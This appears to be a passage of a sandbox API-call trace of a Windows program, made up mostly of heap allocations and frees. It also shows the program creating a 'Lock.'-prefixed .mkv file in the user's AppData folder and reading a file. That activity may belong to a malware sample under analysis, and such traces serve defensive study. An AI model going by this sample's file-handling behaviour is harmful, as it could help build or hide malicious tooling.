1 [0149.413] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70c0 [0149.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0149.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0149.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0149.413] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.413] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0149.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0149.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0149.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0149.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0149.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0149.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0149.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0149.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0149.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0149.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0149.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0149.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0149.414] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0149.414] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.414] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0149.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0149.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0149.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0149.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0149.415] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.NWn0_eXN3pgA63Ym.mkv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.nwn0_exn3pga63ym.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ec [0149.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7220 [0149.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0149.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0149.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0149.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0149.415] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0149.415] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.415] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0149.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0149.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0149.416] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0149.416] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0149.416] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0149.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0149.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0149.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0149.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0149.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0149.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0149.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0149.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0149.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0149.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0149.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0149.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0149.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0149.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0149.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cdc020 [0149.419] SetFilePointerEx (in: hFile=0x4fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0149.420] ReadFile (in: hFile=0x4fc, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x62c, lpOverlapped=0x0) returned 1 [0149.423] ReadFile (in: hFile=0x4fc, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0149.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0149.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0149.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0149.423] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x62c) returned 0x2aae878 [0149.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cdc020 | out: hHeap=0x2af0000) returned 1 [0149.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0149.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0149.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0149.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0149.425] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0149.425] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0149.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x62c) returned 0x2a74958 [0149.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0149.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0149.426] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0149.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0149.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0149.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0149.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0149.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x62c) returned 0x2aae878 [0149.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0149.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0149.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0149.426] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0149.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0149.426] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0149.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0149.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0149.426] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0149.427] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0149.427] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0149.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0149.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72248 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x62c) returned 0x2aae878 [0149.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72278 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0149.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72288 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0149.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722d8 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0149.427] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0149.427] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa000 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0149.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x62c) returned 0x2a74f90 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0149.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0149.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0149.428] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0149.428] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.428] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0149.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0149.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0149.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0149.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0149.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0149.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0149.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0149.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0149.429] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0149.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0149.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0149.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0149.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0149.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0149.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0149.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0149.429] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0149.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0149.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0149.429] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0149.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0149.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0149.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0149.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0149.429] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0149.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0149.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0149.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0149.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0149.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0149.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0149.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0149.430] HeapFree (in: hHeap=0x2af0000, 